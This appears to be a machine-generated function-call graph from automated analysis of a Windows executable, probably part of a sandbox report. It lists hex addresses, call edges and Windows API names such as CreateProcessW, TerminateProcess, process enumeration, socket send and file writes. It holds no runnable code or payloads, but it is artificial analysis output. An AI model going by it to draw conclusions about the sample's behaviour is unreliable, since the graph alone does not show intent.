108815 cecc61 108814->108815 108816 cec934 108814->108816 108817 cecc6e 108815->108817 108818 cecca9 108815->108818 108816->108813 108847 ccabf3 108816->108847 108865 cad6b4 48 API calls 108817->108865 108818->108813 108823 ceccb6 108818->108823 108820 cec964 108820->108813 108824 cec973 108820->108824 108822 cecc87 108866 cd97b6 89 API calls 108822->108866 108867 cad6b4 48 API calls 108823->108867 108833 cec9a1 108824->108833 108851 cca8c8 108824->108851 108828 ceccd6 108868 cd503c 91 API calls Mailbox 108828->108868 108830 cecadc VariantInit 108837 cecb11 _memset 108830->108837 108834 ceca4a 108833->108834 108861 cca25b 106 API calls 108833->108861 108834->108830 108835 ceca86 VariantClear 108834->108835 108835->108834 108836 cecaa5 SysAllocString 108835->108836 108836->108834 108844 cecc52 108844->108795 108848 ccac04 __wsetenvp 108847->108848 108850 ccac16 108847->108850 108848->108850 108870 c93bcf 108848->108870 108850->108820 108853 cca8f2 108851->108853 108852 cca90a 108852->108833 108853->108852 108854 cca9ed SysFreeString 108853->108854 108855 ccaa7e 108853->108855 108856 cca9f9 108853->108856 108854->108856 108855->108852 108855->108856 108856->108852 108861->108833 108865->108822 108866->108844 108867->108828 108868->108844 108869->108844 108871 c93bd9 __wsetenvp 108870->108871 108872 cb010a 48 API calls 108871->108872 108873 c93bee _wcscpy 108872->108873 108873->108850 108876 cb010a 48 API calls 108875->108876 108877 c9a702 108876->108877 108877->108803 108878->108803 108880 c9a309 108879->108880 108882 c9a321 _memmove 108879->108882 108880->108882 108883 c9b8a7 108880->108883 108882->108803 108884 c9b8ba 108883->108884 108886 c9b8b7 _memmove 108883->108886 108885 cb010a 48 API calls 108884->108885 108885->108886 108886->108882 108888 d0787b 108887->108888 108891 ca406c 108887->108891 109028 cdd520 86 API calls 4 library calls 108888->109028 108890 d0788c 109029 cdd520 86 API calls 4 library calls 108890->109029 108891->108890 108898 ca40a6 _memmove 108891->108898 108893 ca4175 108899 ca4185 108893->108899 109027 ced21a 82 API calls Mailbox 108893->109027 108895 cb010a 48 API calls 108895->108898 108896 ca41f1 108896->108703 108897 c9fa40 407 API calls 108897->108898 108898->108893 108898->108895 108898->108897 108898->108899 108900 d078d8 108898->108900 108899->108703 109030 cdd520 86 API calls 4 library calls 108900->109030 108903 ce95e0 108902->108903 108903->108700 108905 c95105 108904->108905 108906 c950f6 108904->108906 108905->108906 108907 c9510a CloseHandle 108905->108907 108906->108700 108907->108906 108909 c9d3d2 48 API calls 108908->108909 108910 cf354a 108909->108910 108911 c9d3d2 48 API calls 108910->108911 108912 cf3553 108911->108912 108913 c9d3d2 48 API calls 108912->108913 108914 cf355c 108913->108914 108915 c984a6 81 API calls 108914->108915 108923 cf35e9 Mailbox 108914->108923 108916 cf3580 108915->108916 109031 cf3d7b 108916->109031 108923->108700 108997 c984a6 81 API calls 108996->108997 108998 ce6fd6 SetWindowTextW 108997->108998 108998->108700 109114 ce22e5 108999->109114 109001 ce1090 109001->108700 109003 c984a6 81 API calls 109002->109003 109004 cddcfc 109003->109004 109300 cd6d6d 109004->109300 109006 cddd06 109006->108700 109008 c9cdb4 48 API calls 109007->109008 109009 ce9515 109008->109009 109010 cdbe47 50 API calls 109009->109010 109011 ce9522 109010->109011 109012 ce952f send 109011->109012 109013 ce9546 109012->109013 109014 ce9552 WSAGetLastError 109013->109014 109015 ce956a 109013->109015 109014->109015 109015->108700 109017 c9cdb4 48 API calls 109016->109017 109018 caf572 109017->109018 109019 caf57a timeGetTime 109018->109019 109020 d075d1 Sleep 109018->109020 109021 c9cdb4 48 API calls 109019->109021 109022 caf590 109021->109022 109312 c9e1f0 109022->109312 109025->108701 109026->108700 109027->108896 109028->108890 109029->108899 109030->108899 109079 c9c4cd 109031->109079 109033 cf3d89 109034 c9c4cd 48 API calls 109033->109034 109035 cf3d91 109034->109035 109080 c9c4da 109079->109080 109081 c9c4e7 109079->109081 109080->109033 109082 cb010a 48 API calls 109081->109082 109082->109080 109115 ce2306 109114->109115 109116 ce230a 109115->109116 109117 ce2365 109115->109117 109118 cb010a 48 API calls 109116->109118 109183 caf0f3 48 API calls 109117->109183 109120 ce2311 109118->109120 109121 ce231f 109120->109121 109170 c95080 49 API calls 109120->109170 109123 c984a6 81 API calls 109121->109123 109125 ce2331 109123->109125 109124 ce2379 109126 ce234d 109124->109126 109128 ce243f 109124->109128 109131 ce23bb 109124->109131 109171 c94bf9 109125->109171 109126->109001 109129 cdbe47 50 API calls 109128->109129 109132 ce2446 109129->109132 109134 c984a6 81 API calls 109131->109134 109190 cd689f SetFilePointerEx SetFilePointerEx WriteFile 109132->109190 109135 ce23c2 109134->109135 109137 ce23f6 109135->109137 109146 ce2400 109135->109146 109152 cd67dc 109137->109152 109141 ce23fe Mailbox 109141->109126 109148 c950ec CloseHandle 109141->109148 109184 c97b6e 109146->109184 109149 ce2490 109148->109149 109191 c94592 CloseHandle 109149->109191 109153 cd67ec 109152->109153 109154 cd67f6 109152->109154 109208 cd6917 SetFilePointerEx SetFilePointerEx WriteFile 109153->109208 109156 cd67fc 109154->109156 109157 cd6808 109154->109157 109209 cd68b9 51 API calls 109156->109209 109158 cd6824 109157->109158 109159 cd6811 109157->109159 109192 c9a6d4 109158->109192 109161 c9a6d4 48 API calls 109159->109161 109169 cd67f4 Mailbox 109169->109141 109170->109121 109172 c950ec CloseHandle 109171->109172 109173 c94c04 109172->109173 109246 c94b88 109173->109246 109183->109124 109185 cb010a 48 API calls 109184->109185 109186 c97b93 109185->109186 109187 c9a6f8 48 API calls 109186->109187 109188 c97ba2 109187->109188 109190->109141 109191->109126 109208->109169 109209->109169 109247 d04957 109246->109247 109248 c94ba1 CreateFileW 109246->109248 109251 c94bc3 109247->109251 109248->109251 109301 cd6d8a __wsetenvp 109300->109301 109302 cd6db3 GetFileAttributesW 109301->109302 109303 cd6dc5 GetLastError 109302->109303 109304 cd6de3 109302->109304 109305 cd6de7 109303->109305 109306 cd6dd0 CreateDirectoryW 109303->109306 109304->109006 109305->109304 109307 c93bcf 48 API calls 109305->109307 109306->109304 109306->109305 109308 cd6df7 _wcsrchr 109307->109308 109308->109304 109309 cd6d6d 48 API calls 109308->109309 109310 cd6e1b 109309->109310 109310->109304 109311 cd6e28 CreateDirectoryW 109310->109311 109311->109304 109313 c9e216 109312->109313 109373 c9e226 Mailbox 109312->109373 109314 c9e670 109313->109314 109313->109373 109442 caecee 407 API calls 109314->109442 109316 c9e4fd 109316->108700 109318 c9e681 109318->109316 109319 c9e68e 109318->109319 109444 caec33 407 API calls Mailbox 109319->109444 109320 c9e26c PeekMessageW 109320->109373 109322 d05b13 Sleep 109322->109373 109323 c9e695 LockWindowUpdate DestroyWindow GetMessageW 109323->109316 109326 c9e6c7 109323->109326 109324 c9e4e7 109324->109316 109443 c9322e 16 API calls 109324->109443 109330 c9e657 PeekMessageW 109330->109373 109331 cb010a 48 API calls 109331->109373 109332 c9e517 timeGetTime 109332->109373 109334 c9c935 48 API calls 109334->109373 109335 d05dfc WaitForSingleObject 109338 d05e19 GetExitCodeProcess CloseHandle 109335->109338 109335->109373 109336 c9e641 TranslateMessage DispatchMessageW 109336->109330 109337 d06147 Sleep 109369 d05cce Mailbox 109337->109369 109338->109373 109339 c9d3d2 48 API calls 109339->109369 109340 c9e6cc timeGetTime 109445 cacf79 49 API calls 109340->109445 109341 d05feb Sleep 109341->109373 109347 d061de GetExitCodeProcess 109351 d061f4 WaitForSingleObject 109347->109351 109352 d0620a CloseHandle 109347->109352 109349 c91000 383 API calls 109349->109373 109350 d05cea Sleep 109350->109373 109351->109352 109351->109373 109352->109369 109353 d05cd7 Sleep 109353->109350 109354 cf8a48 108 API calls 109354->109369 109355 c91dce 107 API calls 109355->109373 109357 d06266 Sleep 109357->109373 109358 cacf79 49 API calls 109358->109373 109361 c9caee 48 API calls 109361->109369 109363 c9fa40 383 API calls 109363->109373 109364 c9d380 55 API calls 109364->109369 109366 ca44e0 383 API calls 109366->109373 109367 ca3680 383 API calls 109367->109373 109368 c9caee 48 API calls 109368->109373 109369->109339 109369->109347 109369->109350 109369->109353 109369->109354 109369->109357 109369->109361 109369->109364 109369->109373 109447 cd56dc 49 API calls Mailbox 109369->109447 109448 cacf79 49 API calls 109369->109448 109449 c91000 407 API calls 109369->109449 109451 ced12a 50 API calls 109369->109451 109452 cd8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109369->109452 109453 cae3a5 timeGetTime 109369->109453 109454 cd6f5b CreateToolhelp32Snapshot Process32FirstW 109369->109454 109370 cdd520 86 API calls 109370->109373 109372 c9d380 55 API calls 109372->109373 109373->109320 109373->109322 109373->109324 109373->109330 109373->109331 109373->109332 109373->109334 109373->109335 109373->109336 109373->109337 109373->109340 109373->109341 109373->109349 109373->109350 109373->109355 109373->109358 109373->109363 109373->109366 109373->109367 109373->109368 109373->109369 109373->109370 109373->109372 109374 c9e7e0 109373->109374 109381 c9ea00 109373->109381 109431 caf381 109373->109431 109436 caed1a 109373->109436 109441 c9e7b0 407 API calls Mailbox 109373->109441 109446 cf8b20 48 API calls 109373->109446 109450 cae3a5 timeGetTime 109373->109450 109375 c9e7fd 109374->109375 109377 c9e80f 109374->109377 109461 c9dcd0 109375->109461 109492 cdd520 86 API calls 4 library calls 109377->109492 109378 c9e806 109378->109373 109380 d098e8 109380->109380 109382 c9ea20 109381->109382 109383 c9fa40 407 API calls 109382->109383 109388 c9ea89 109382->109388 109385 d09919 109383->109385 109384 d099bc 109507 cdd520 86 API calls 4 library calls 109384->109507 109385->109388 109504 cdd520 86 API calls 4 library calls 109385->109504 109386 c9fa40 407 API calls 109400 c9ecd7 Mailbox 109386->109400 109391 c9d3d2 48 API calls 109388->109391 109388->109400 109407 c9eb18 109388->109407 109389 c9d3d2 48 API calls 109392 d09997 109389->109392 109393 d09963 109391->109393 109506 cb1b2a 52 API calls __cinit 109392->109506 109505 cb1b2a 52 API calls __cinit 109393->109505 109396 c9d380 55 API calls 109396->109400 109398 d09d70 109516 cee2fb 407 API calls Mailbox 109398->109516 109399 d09e49 109521 cdd520 86 API calls 4 library calls 109399->109521 109400->109384 109400->109386 109400->109396 109400->109398 109400->109399 109401 cdd520 86 API calls 109400->109401 109402 d09dc2 109400->109402 109403 d09ddf 109400->109403 109410 c9342c 48 API calls 109400->109410 109413 ca14a0 48 API calls 109400->109413 109414 c9ef0c Mailbox 109400->109414 109415 c9f56f 109400->109415 109419 d09a3c 109400->109419 109500 c9d805 109400->109500 109508 cda3ee 48 API calls 109400->109508 109509 ceede9 407 API calls 109400->109509 109514 cca599 InterlockedDecrement 109400->109514 109515 cef4df 407 API calls 109400->109515 109401->109400 109518 cdd520 86 API calls 4 library calls 109402->109518 109519 cec235 407 API calls Mailbox 109403->109519 109407->109389 109407->109400 109410->109400 109412 d09df7 109412->109414 109413->109400 109414->109373 109415->109414 109517 cdd520 86 API calls 4 library calls 109415->109517 109510 ced154 48 API calls 109419->109510 109421 d09a48 109433 caf390 109431->109433 109434 d0ee11 109431->109434 109432 d0ee46 109433->109373 109434->109432 109435 d0ee28 TranslateAcceleratorW 109434->109435 109435->109433 109437 caed2c 109436->109437 109438 caed34 109436->109438 109437->109373 109438->109437 109439 caed5e IsDialogMessageW 109438->109439 109440 d0ebec GetClassLongW 109438->109440 109439->109437 109439->109438 109440->109438 109440->109439 109441->109373 109442->109324 109443->109318 109444->109323 109445->109373 109446->109373 109447->109369 109448->109369 109449->109369 109450->109373 109451->109369 109452->109369 109453->109369 109522 cd79c2 109454->109522 109456 cd6fa4 Process32NextW 109457 cd7021 CloseHandle 109456->109457 109459 cd6fa0 _wcscat 109456->109459 109457->109369 109459->109456 109459->109457 109460 cb1bc7 _W_store_winword 59 API calls 109459->109460 109528 cb297d 109459->109528 109460->109459 109462 c9fa40 407 API calls 109461->109462 109476 c9dd0f _memmove 109462->109476 109463 d08dbe 109499 cdd520 86 API calls 4 library calls 109463->109499 109466 c9dd70 109466->109378 109467 c9e12b Mailbox 109470 cb010a 48 API calls 109467->109470 109469 cb010a 48 API calls 109469->109476 109476->109463 109476->109466 109476->109467 109476->109469 109477 c9deb7 109476->109477 109487 c9df29 109476->109487 109477->109467 109479 c9dec4 109477->109479 109492->109380 109501 c9d828 _memmove 109500->109501 109502 c9d815 109500->109502 109501->109400 109502->109501 109504->109388 109505->109407 109506->109400 109507->109414 109508->109400 109509->109400 109510->109421 109514->109400 109515->109400 109516->109415 109517->109414 109518->109414 109519->109412 109521->109414 109523 cd79e9 109522->109523 109527 cd79d0 109522->109527 109532 cb224a 58 API calls __wcstoi64 109523->109532 109526 cd79ef 109526->109459 109527->109523 109527->109526 109531 cb22df GetStringTypeW __towlower_l 109527->109531 109531->109527 109532->109526 109560 c9a9af 109559->109560 109563 c9a9ca 109559->109563 109561 c9b8a7 48 API calls 109560->109561 109562 c9a9b7 CharUpperBuffW 109561->109562 109562->109563 109563->108718 109565 c910f9 109564->109565 109566 d04c5a 109564->109566 109567 cb010a 48 API calls 109565->109567 109568 c91100 109567->109568 109569 c91121 109568->109569 109592 c9113c 48 API calls 109568->109592 109569->108734 109571->108727 109572->108739 109573->108739 109574->108739 109575->108785 109576->108727 109577->108784 109578->108769 109579->108769 109581->108784 109582->108755 109585->108784 109586->108739 109587->108739 109588->108739 109589->108784 109590->108774 109591->108784 109592->109569 109593->108305 109594->108320 109595->108320 109596->108332 109597->108325 109598->108320 109599->108322 109600->108345 109602 c91990 109601->109602 109606 c919af _memmove 109601->109606 109604 cb010a 48 API calls 109602->109604 109603 cb010a 48 API calls 109605 c919c6 109603->109605 109604->109606 109605->108375 109606->109603 109607->108360 109608->108365 109609->108369 109611 c984a6 81 API calls 109610->109611 109612 cef7db 109611->109612 109636 cef81d Mailbox 109612->109636 109646 cf0458 109612->109646 109614 cefa7c 109615 cefbeb 109614->109615 109619 cefa86 109614->109619 109692 cf0579 89 API calls Mailbox 109615->109692 109618 cefbf8 109618->109619 109621 cefc04 109618->109621 109659 cef5fb 109619->109659 109620 c984a6 81 API calls 109640 cef875 Mailbox 109620->109640 109621->109636 109626 cefaba 109673 caf92c 109626->109673 109629 cefaee 109680 c93320 109629->109680 109630 cefad4 109679 cdd520 86 API calls 4 library calls 109630->109679 109633 cefadf GetCurrentProcess TerminateProcess 109633->109629 109634 cefb05 109637 ca14a0 48 API calls 109634->109637 109644 cefb2f 109634->109644 109636->108378 109640->109614 109640->109620 109640->109636 109677 cf28d9 48 API calls _memmove 109640->109677 109678 cefc96 60 API calls 2 library calls 109640->109678 109647 c9b8a7 48 API calls 109646->109647 109648 cf0473 CharLowerBuffW 109647->109648 109694 ce267a 109648->109694 109652 c9d3d2 48 API calls 109653 cf04ac 109652->109653 109654 c97f40 48 API calls 109653->109654 109656 cf04c3 109654->109656 109655 cf050b Mailbox 109655->109640 109657 c9a2fb 48 API calls 109656->109657 109658 cf04cf Mailbox 109657->109658 109658->109655 109701 cefc96 60 API calls 2 library calls 109658->109701 109660 cef616 109659->109660 109664 cef66b 109659->109664 109661 cb010a 48 API calls 109660->109661 109662 cef638 109661->109662 109663 cb010a 48 API calls 109662->109663 109662->109664 109663->109662 109665 cf0719 109664->109665 109666 cf0944 Mailbox 109665->109666 109672 cf073c _strcat _wcscpy __wsetenvp 109665->109672 109666->109626 109667 c9d00b 58 API calls 109667->109672 109668 c9cdb4 48 API calls 109668->109672 109669 c984a6 81 API calls 109669->109672 109670 cb45ec 47 API calls _W_store_winword 109670->109672 109672->109666 109672->109667 109672->109668 109672->109669 109672->109670 109704 cd8932 50 API calls __wsetenvp 109672->109704 109674 caf941 109673->109674 109675 caf9d9 select 109674->109675 109676 caf9a7 109674->109676 109675->109676 109676->109629 109676->109630 109677->109640 109678->109640 109679->109633 109681 c93339 Mailbox 109680->109681 109682 c93334 109680->109682 109688 c93347 109681->109688 109706 c9346e 48 API calls 109681->109706 109705 c9342c 48 API calls 109682->109705 109685 cb010a 48 API calls 109687 c933d8 109685->109687 109686 c93422 109686->109634 109688->109685 109688->109686 109692->109618 109695 ce26a4 __wsetenvp 109694->109695 109696 ce26e2 109695->109696 109697 ce26d8 109695->109697 109700 ce2763 109695->109700 109696->109652 109696->109658 109697->109696 109702 cadfd2 60 API calls 109697->109702 109700->109696 109703 cadfd2 60 API calls 109700->109703 109701->109655 109702->109697 109703->109700 109704->109672 109705->109681 109706->109688 109707->108419 109709 cadd89 109708->109709 109710 d04a7d FindFirstFileW 109708->109710 109709->108092 109711 d04a95 FindClose 109710->109711 109712 d04a8e 109710->109712 109712->109711 109714 c9d89e 50 API calls 109713->109714 109715 c91a08 109714->109715 109716 c91a12 109715->109716 109717 d0db7d 109715->109717 109718 c984a6 81 API calls 109716->109718 109719 c97e53 48 API calls 109717->109719 109720 c91a1f 109718->109720 109721 d0db8d 109719->109721 109722 c9c935 48 API calls 109720->109722 109721->109721 109723 c91a2d 109722->109723 109724 c91dce 109723->109724 109725 c91de4 Mailbox 109724->109725 109726 d0db26 109725->109726 109728 c91dfd 109725->109728 109727 d0db2b IsWindow 109726->109727 109730 d0db3f 109727->109730 109738 c91e51 109727->109738 109729 c91e46 109728->109729 109731 c984a6 81 API calls 109728->109731 109733 d0db65 IsWindow 109729->109733 109729->109738 109815 c9200a 109730->109815 109734 c91e17 109731->109734 109733->109730 109733->109738 109762 c91f04 109734->109762 109737 c9197e 48 API calls 109737->109738 109738->108441 109738->108442 109740 c9c4cd 48 API calls 109739->109740 109741 cce2fe 109740->109741 109854 c9193b SendMessageTimeoutW 109741->109854 109743 cce305 109755 cce309 Mailbox 109743->109755 109855 cce390 109743->109855 109745 cce314 109746 cb010a 48 API calls 109745->109746 109747 cce338 SendMessageW 109746->109747 109747->109755 109755->108447 109757 c97c3a 109756->109757 109759 c97bfb 109756->109759 109758 c9c935 48 API calls 109757->109758 109761 c97c0e 109758->109761 109760 cb010a 48 API calls 109759->109760 109760->109761 109761->108449 109763 c91f1a Mailbox 109762->109763 109764 c9c935 48 API calls 109763->109764 109765 c91f3e 109764->109765 109766 c9c935 48 API calls 109765->109766 109767 c91f49 109766->109767 109768 c97e53 48 API calls 109767->109768 109769 c91f59 109768->109769 109770 c9d3d2 48 API calls 109769->109770 109771 c91f87 109770->109771 109772 c9d3d2 48 API calls 109771->109772 109773 c91f90 109772->109773 109774 c9d3d2 48 API calls 109773->109774 109775 c91f99 109774->109775 109776 c91fac 109775->109776 109777 d02569 109775->109777 109779 d02583 109776->109779 109780 c91fbe GetForegroundWindow 109776->109780 109819 cce4ea 60 API calls 3 library calls 109777->109819 109817 c92016 109815->109817 109816 cb010a 48 API calls 109818 c92023 109816->109818 109817->109816 109818->109737 109819->109779 109854->109743 109880 c9193b SendMessageTimeoutW 109855->109880 109857 cce39a 109858 cce39e 109857->109858 109859 cce3a2 SendMessageW 109857->109859 109858->109745 109859->109745 109880->109857 109889 ceae3b 109881->109889 109884 cead05 Mailbox 109885 cead31 htons 109884->109885 109886 cead1b 109884->109886 109885->109886 109886->108461 109888 cdd7f2 109887->109888 109888->108468 109890 c9a6d4 48 API calls 109889->109890 109891 ceae49 109890->109891 109894 ceae79 WideCharToMultiByte 109891->109894 109893 ceacf3 inet_addr 109893->109884 109895 ceae9d 109894->109895 109896 ceaea7 109894->109896 109897 caf324 48 API calls 109895->109897 109898 cb010a 48 API calls 109896->109898 109901 ceaea5 109897->109901 109899 ceaeae WideCharToMultiByte 109898->109899 109900 caf2d0 48 API calls 109899->109900 109900->109901 109901->109893 109903 c980f9 109902->109903 109904 c9816b 109902->109904 109903->109904 109906 c98105 109903->109906 109905 c9a2fb 48 API calls 109904->109905 109907 c9813a _memmove 109905->109907 109908 c98110 109906->109908 109909 c98163 109906->109909 109907->108539 109911 c9a6f8 48 API calls 109908->109911 109929 c97eda 48 API calls 109909->109929 109912 c9811a 109911->109912 109913 cb010a 48 API calls 109912->109913 109913->109907 109915 cb010a 48 API calls 109914->109915 109916 c9818f 109915->109916 109916->108539 109918 ca245f 109917->109918 109926 ca2332 109917->109926 109918->108539 109919 ca2480 109919->108539 109920 ca246a 109922 c9d89e 50 API calls 109920->109922 109921 ca2419 109923 cb010a 48 API calls 109921->109923 109924 ca2472 109922->109924 109925 ca2420 109923->109925 109924->108539 109925->108539 109926->109919 109926->109920 109926->109921 109927->108539 109928->108485 109929->109907 109931 caf069 109930->109931 109932 caf057 109930->109932 109935 c9c4cd 48 API calls 109931->109935 109933 caf05d 109932->109933 109934 caf063 109932->109934 109937 c9a6d4 48 API calls 109933->109937 109938 c9a6d4 48 API calls 109934->109938 109936 cd64f5 109935->109936 109946 cd6524 109936->109946 109965 cd649b ReadFile SetFilePointerEx 109936->109965 109966 c9bd2f 48 API calls _memmove 109936->109966 109940 caf081 109937->109940 109939 cd668b 109938->109939 109941 c94c4f 50 API calls 109939->109941 109959 c94c4f 109940->109959 109945 cd6699 109941->109945 109952 cd66a9 Mailbox 109945->109952 109967 cd6765 50 API calls 109945->109967 109946->108578 109947 d049b2 109950 c9c610 50 API calls 109951 caf0a3 Mailbox 109950->109951 109951->108578 109952->108578 109953->108551 109954->108583 109955->108557 109956->108556 109957->108574 109958->108581 109960 caf324 48 API calls 109959->109960 109961 c94c60 109960->109961 109962 c94ca0 2 API calls 109961->109962 109964 c94c95 109961->109964 109968 c94d29 109961->109968 109962->109961 109964->109947 109964->109950 109965->109936 109966->109936 109967->109952 109969 c94d3d 109968->109969 109970 d045cf 109968->109970 109977 c94d67 109969->109977 109972 c9a6f8 48 API calls 109970->109972 109974 d045da 109972->109974 109973 c94d49 109973->109961 109975 cb010a 48 API calls 109974->109975 109976 d045ef _memmove 109975->109976 109978 c94d7d 109977->109978 109981 c94d78 _memmove 109977->109981 109979 d04703 109978->109979 109980 cb010a 48 API calls 109978->109980 109980->109981 109981->109973 109982->108590 109983->108606 109984->108608 109986 ce6b25 GetWindowRect 109985->109986 109987 ce6b42 109985->109987 109988 ce6b5c 109986->109988 109987->109988 109989 ce6b52 ClientToScreen 109987->109989 109988->108617 109988->108621 109989->109988 109991 cd7700 109990->109991 110002 cd76f9 _wcsncpy 109990->110002 109992 cb010a 48 API calls 109991->109992 109993 cd7706 GetFileVersionInfoW 109992->109993 109994 cd7722 __wsetenvp 109993->109994 109995 cb010a 48 API calls 109994->109995 109997 cd7739 _wcscat _wcscmp _wcscpy _wcsstr 109995->109997 109996 cb1bc7 _W_store_winword 59 API calls 109998 cd77f7 109996->109998 110000 cd7779 74AB1560 109997->110000 110004 cd7793 _wcscat 109997->110004 109999 cd7827 74AB1560 109998->109999 109998->110002 110001 cd783d _wcscmp 109999->110001 109999->110002 110000->110004 110001->110002 110005 cb234b 80 API calls 4 library calls 110001->110005 110002->108635 110004->109996 110005->110002 110007 cf23eb _memset 110006->110007 110008 cf2428 110007->110008 110009 cf2452 110007->110009 110010 c9cdb4 48 API calls 110008->110010 110013 c9cdb4 48 API calls 110009->110013 110014 cf2476 110009->110014 110011 cf2433 110010->110011 110011->110014 110016 c9cdb4 48 API calls 110011->110016 110012 cf24b0 110018 c984a6 81 API calls 110012->110018 110015 cf2448 110013->110015 110014->110012 110017 c9cdb4 48 API calls 110014->110017 110020 c9cdb4 48 API calls 110015->110020 110016->110015 110017->110012 110019 cf24d4 110018->110019 110021 c93bcf 48 API calls 110019->110021 110020->110014 110022 cf24de 110021->110022 110023 cf24e8 110022->110023 110024 cf25a1 110022->110024 110026 c984a6 81 API calls 110023->110026 110025 cf25d3 GetCurrentDirectoryW 110024->110025 110027 c984a6 81 API calls 110024->110027 110028 cb010a 48 API calls 110025->110028 110029 cf24f9 110026->110029 110030 cf25b8 110027->110030 110031 cf25f8 GetCurrentDirectoryW 110028->110031 110032 c93bcf 48 API calls 110029->110032 110035 c93bcf 48 API calls 110030->110035 110033 cf2605 110031->110033 110034 cf2503 110032->110034 110039 c9ca8e 48 API calls 110033->110039 110046 cf263e 110033->110046 110036 c984a6 81 API calls 110034->110036 110037 cf25c2 __wsetenvp 110035->110037 110038 cf2514 110036->110038 110037->110025 110037->110046 110040 c93bcf 48 API calls 110038->110040 110041 cf261e 110039->110041 110042 cf251e 110040->110042 110043 c9ca8e 48 API calls 110041->110043 110044 c984a6 81 API calls 110042->110044 110047 cf262e 110043->110047 110048 cf252f 110044->110048 110045 cf268a 110050 cf274c CreateProcessW 110045->110050 110051 cf26c1 110045->110051 110046->110045 110084 cda17a 8 API calls 110046->110084 110052 c9ca8e 48 API calls 110047->110052 110053 c93bcf 48 API calls 110048->110053 110065 cf276b 110050->110065 110087 ccbc90 69 API calls 110051->110087 110052->110046 110056 cf2539 110053->110056 110054 cf2655 110085 cda073 8 API calls 110054->110085 110058 cf256f GetSystemDirectoryW 110056->110058 110062 c984a6 81 API calls 110056->110062 110061 cb010a 48 API calls 110058->110061 110059 cf2670 110086 cda102 8 API calls 110059->110086 110063 cf2594 GetSystemDirectoryW 110061->110063 110064 cf2550 110062->110064 110063->110033 110066 c93bcf 48 API calls 110064->110066 110067 cf27bd CloseHandle 110065->110067 110068 cf2780 110065->110068 110069 cf255a __wsetenvp 110066->110069 110070 cf27cb 110067->110070 110076 cf27f5 110067->110076 110071 cf2791 GetLastError 110068->110071 110069->110033 110069->110058 110088 cd9d09 CloseHandle Mailbox 110070->110088 110074 cf27a5 110071->110074 110073 cf27fb 110073->110074 110089 cd9b29 CloseHandle 110074->110089 110076->110073 110079 cf2827 CloseHandle 110076->110079 110079->110074 110080 cf1f2b 110080->108092 110083 cf26df __wsetenvp 110083->110065 110084->110054 110085->110059 110086->110045 110087->110083 110089->110080 110091 cb4667 __calloc_impl 110090->110091 110096 cb45f8 __calloc_impl 110090->110096 110111 cb889e 47 API calls __getptd_noexit 110091->110111 110094 cb462b RtlAllocateHeap 110094->110096 110103 cb465f 110094->110103 110096->110094 110097 cb4603 110096->110097 110098 cb4653 110096->110098 110101 cb4651 110096->110101 110097->110096 110106 cb8e52 47 API calls 2 library calls 110097->110106 110107 cb8eb2 47 API calls 8 library calls 110097->110107 110108 cb1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 110097->110108 110109 cb889e 47 API calls __getptd_noexit 110098->110109 110110 cb889e 47 API calls __getptd_noexit 110101->110110 110103->108118 110104->108121 110105->108123 110106->110097 110107->110097 110109->110101 110110->110103 110111->110103 110112->108126 110113->108129 110114->108133 110115->108147 110116->108162 110117->108157 110118->108178 110119->108178 110120 c9e8eb 110123 ca2b40 110120->110123 110122 c9e8f7 110124 ca2b98 110123->110124 110164 ca2bfc __wsetenvp _memmove 110123->110164 110125 ca2bbf 110124->110125 110127 ca33cb 110124->110127 110128 d07cf3 110124->110128 110126 cb010a 48 API calls 110125->110126 110130 ca2be8 110126->110130 110198 c95577 407 API calls Mailbox 110127->110198 110129 d07cf8 110128->110129 110137 d07d15 110128->110137 110129->110125 110132 d07d01 110129->110132 110133 cb010a 48 API calls 110130->110133 110201 ced443 407 API calls Mailbox 110132->110201 110133->110164 110134 d07d38 110203 cdd520 86 API calls 4 library calls 110134->110203 110137->110134 110202 ced8ff 407 API calls 2 library calls 110137->110202 110138 ca366d 110222 cdd520 86 API calls 4 library calls 110138->110222 110141 d08518 110141->110122 110142 d084df 110221 cdd520 86 API calls 4 library calls 110142->110221 110143 d083d1 110210 cdd520 86 API calls 4 library calls 110143->110210 110146 c9ca8e 48 API calls 110146->110164 110147 d083eb 110211 cdd520 86 API calls 4 library calls 110147->110211 110148 d07e43 110204 cdd520 86 API calls 4 library calls 110148->110204 110149 c9d380 55 API calls 110149->110164 110150 d08434 110213 cdd520 86 API calls 4 library calls 110150->110213 110152 c9d3d2 48 API calls 110152->110164 110154 c9d349 53 API calls 110154->110164 110156 d0844e 110214 cdd520 86 API calls 4 library calls 110156->110214 110157 c9d2d2 53 API calls 110157->110164 110158 c9d89e 50 API calls 110158->110164 110159 ca345e 110212 cdd520 86 API calls 4 library calls 110159->110212 110161 d084b5 110219 cdd520 86 API calls 4 library calls 110161->110219 110164->110138 110164->110142 110164->110143 110164->110146 110164->110147 110164->110148 110164->110149 110164->110150 110164->110152 110164->110154 110164->110156 110164->110157 110164->110158 110164->110159 110164->110161 110166 d084c8 110164->110166 110167 c9fa40 407 API calls 110164->110167 110169 cb1b2a 52 API calls __cinit 110164->110169 110170 ca3157 110164->110170 110171 c97e53 48 API calls 110164->110171 110173 d081d7 110164->110173 110176 c9cdb4 48 API calls 110164->110176 110177 d084a4 110164->110177 110178 c93320 48 API calls 110164->110178 110182 ca3637 110164->110182 110184 c9c935 48 API calls 110164->110184 110189 d0826c 110164->110189 110194 cca599 InterlockedDecrement 110164->110194 110195 cb010a 48 API calls 110164->110195 110199 c9346e 48 API calls 110164->110199 110200 c9203a 407 API calls 110164->110200 110205 ced154 48 API calls 110164->110205 110206 cdab1c 50 API calls 110164->110206 110220 cdd520 86 API calls 4 library calls 110166->110220 110167->110164 110169->110164 110170->110122 110171->110164 110207 ced154 48 API calls 110173->110207 110176->110164 110218 cdd520 86 API calls 4 library calls 110177->110218 110178->110164 110181 d0822c 110209 c9346e 48 API calls 110181->110209 110215 cdd520 86 API calls 4 library calls 110182->110215 110184->110164 110188 d08259 110191 c93320 48 API calls 110188->110191 110189->110170 110217 cdd520 86 API calls 4 library calls 110189->110217 110190 d081ea 110190->110181 110208 ced154 48 API calls 110190->110208 110193 d08261 110191->110193 110192 d08236 110192->110182 110192->110188 110193->110189 110196 d08478 110193->110196 110194->110164 110195->110164 110216 cdd520 86 API calls 4 library calls 110196->110216 110198->110170 110199->110164 110200->110164 110201->110170 110202->110134 110203->110164 110204->110170 110205->110164 110206->110164 110207->110190 110208->110190 110209->110192 110210->110147 110211->110170 110212->110170 110213->110156 110214->110170 110215->110170 110216->110170 110217->110170 110218->110170 